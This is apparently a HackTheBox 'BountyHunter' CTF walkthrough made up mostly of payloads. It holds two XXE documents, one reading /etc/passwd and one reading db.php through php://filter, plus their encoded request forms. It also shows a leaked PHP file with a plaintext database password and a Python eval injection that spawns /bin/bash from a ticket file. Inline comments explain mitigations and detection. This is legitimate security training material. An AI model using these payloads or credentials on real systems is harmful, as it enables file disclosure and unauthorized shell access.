BountyHunter Walkthrough: HackTheBox Writeup

Reconnaissance

Discovery and Scanning

Enumeration

<?xml  version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<!-- XXE test document for the bug-report form.
     The internal DTD subset above declares an external general entity named xxe
     whose system identifier is a local file URI. -->
<!-- Why it matters: a parser that resolves external entities replaces the entity
     reference in <title> with the file's contents, so any field the application
     echoes back discloses that file. The server-side parser settings are not shown
     on this page; presumably DTD processing and external entity loading are enabled. -->
<!-- Mitigation: a bug-report form has no need for a DTD. Configure the receiving
     parser to reject DOCTYPE declarations, or at least to disable external entity
     resolution. Detection: alert on request bodies that, once decoded, contain
     a DOCTYPE or an ENTITY declaration with a SYSTEM identifier. -->
<bugreport>
<!-- Entity reference: expands to the declared resource when entities are resolved. -->
<title>&xxe;</title>
<!-- The remaining fields appear to hold placeholder values only. -->
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>
%50%44%39%34%62%57%77%67%49%48%5a%6c%63%6e%4e%70%62%32%34%39%49%6a%45%75%4d%43%49%67%5a%57%35%6a%62%32%52%70%62%6d%63%39%49%6b%6c%54%54%79%30%34%4f%44%55%35%4c%54%45%69%50%7a%34%38%49%55%52%50%51%31%52%5a%55%45%55%67%5a%6d%39%76%49%46%73%67%50%43%46%46%54%45%56%4e%52%55%35%55%49%47%5a%76%62%79%42%42%54%6c%6b%67%50%67%6f%67%49%43%41%67%49%43%41%67%49%44%77%68%52%55%35%55%53%56%52%5a%49%48%68%34%5a%53%42%54%57%56%4e%55%52%55%30%67%49%6d%5a%70%62%47%55%36%4c%79%38%76%5a%58%52%6a%4c%33%42%68%63%33%4e%33%5a%43%49%67%50%6c%30%2b%43%67%6b%4a%50%47%4a%31%5a%33%4a%6c%63%47%39%79%64%44%34%4b%43%51%6b%38%64%47%6c%30%62%47%55%2b%4a%6e%68%34%5a%54%73%38%4c%33%52%70%64%47%78%6c%50%67%6f%4a%43%54%78%6a%64%32%55%2b%4d%6a%77%76%59%33%64%6c%50%67%6f%4a%43%54%78%6a%64%6e%4e%7a%50%6a%4d%38%4c%32%4e%32%63%33%4d%2b%43%67%6b%4a%50%48%4a%6c%64%32%46%79%5a%44%34%30%50%43%39%79%5a%58%64%68%63%6d%51%2b%43%67%6b%4a%50%43%39%69%64%57%64%79%5a%58%42%76%63%6e%51%2b
<?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM “php://filter/convert.base64-encode/resource=/var/www/html/db.php” >]>
<!-- Second XXE test document. It has the same structure as the first, but the
     system identifier uses PHP's php://filter stream wrapper with the
     convert.base64-encode filter on a PHP file under the web root. -->
<!-- Why the filter: the resource is returned base64-encoded, so the PHP source is
     read as data. Presumably this is needed because raw PHP source would not
     survive being inlined into an XML text node. -->
<!-- NOTE(review): the curly quotes and the en dash in the encoding name are
     presumably typography introduced by the publishing platform; as printed this
     listing is not well-formed XML. -->
<!-- Mitigation: once external entity loading is enabled in a PHP XML parser, PHP
     stream wrappers are reachable through SYSTEM identifiers. Reject DOCTYPE
     declarations in user-supplied XML and keep entity loading disabled. Detection:
     flag decoded request bodies that contain a php:// or file:// system identifier. -->
<bugreport>
<!-- Entity reference: expands to the declared resource when entities are resolved. -->
<title>&xxe;</title>
<!-- The remaining fields appear to hold placeholder values only. -->
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>
%50%44%39%34%62%57%77%67%49%48%5a%6c%63%6e%4e%70%62%32%34%39%49%6a%45%75%4d%43%49%67%5a%57%35%6a%62%32%52%70%62%6d%63%39%49%6b%6c%54%54%79%30%34%4f%44%55%35%4c%54%45%69%50%7a%34%38%49%55%52%50%51%31%52%5a%55%45%55%67%5a%6d%39%76%49%46%73%67%50%43%46%46%54%45%56%4e%52%55%35%55%49%47%5a%76%62%79%42%42%54%6c%6b%67%50%67%6f%67%49%43%41%67%49%43%41%67%49%44%77%68%52%55%35%55%53%56%52%5a%49%48%68%34%5a%53%42%54%57%56%4e%55%52%55%30%67%49%6e%42%6f%63%44%6f%76%4c%32%5a%70%62%48%52%6c%63%69%39%6a%62%32%35%32%5a%58%4a%30%4c%6d%4a%68%63%32%55%32%4e%43%31%6c%62%6d%4e%76%5a%47%55%76%63%6d%56%7a%62%33%56%79%59%32%55%39%4c%33%5a%68%63%69%39%33%64%33%63%76%61%48%52%74%62%43%39%6b%59%69%35%77%61%48%41%69%49%44%35%64%50%67%6f%4a%43%54%78%69%64%57%64%79%5a%58%42%76%63%6e%51%2b%43%67%6b%4a%50%48%52%70%64%47%78%6c%50%69%5a%34%65%47%55%37%50%43%39%30%61%58%52%73%5a%54%34%4b%43%51%6b%38%59%33%64%6c%50%6a%49%38%4c%32%4e%33%5a%54%34%4b%43%51%6b%38%59%33%5a%7a%63%7a%34%7a%50%43%39%6a%64%6e%4e%7a%50%67%6f%4a%43%54%78%79%5a%58%64%68%63%6d%51%2b%4e%44%77%76%63%6d%56%33%59%58%4a%6b%50%67%6f%4a%43%54%77%76%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%3d%3d
<?php
// Database connection settings held as plain variables. Presumably this is the
// decoded content of /var/www/html/db.php, the file named in the second XXE
// document above. Confirm against the original writeup.
//
// Security note: the credentials are hard-coded in a file under the web root, so
// any file-read flaw in the application discloses them. Keep secrets outside the
// document root (environment or a secret store), give the database account only
// the privileges the application needs, and never share this password with an
// operating-system or SSH account.
//
// NOTE(review): the curly quotes below are presumably typography introduced by
// the publishing platform; the file on disk would use straight quotes.
// TODO -> Implement login system with the database.
$dbserver = “localhost”;   // database host
$dbname = “bounty”;        // schema name
$dbusername = “admin”;     // database account
$dbpassword = “m19RoAU0hP41A1sTsq6K”;   // plaintext secret: rotate after any disclosure
$testuser = “test”;        // a test user name; its use is not shown in this file
?>
# Skytrain Inc
## Ticket to abc
__Ticket Code:__ abc
**102+ 10 == 112 and __import__(‘os’).system(‘/bin/bash’) == False

References
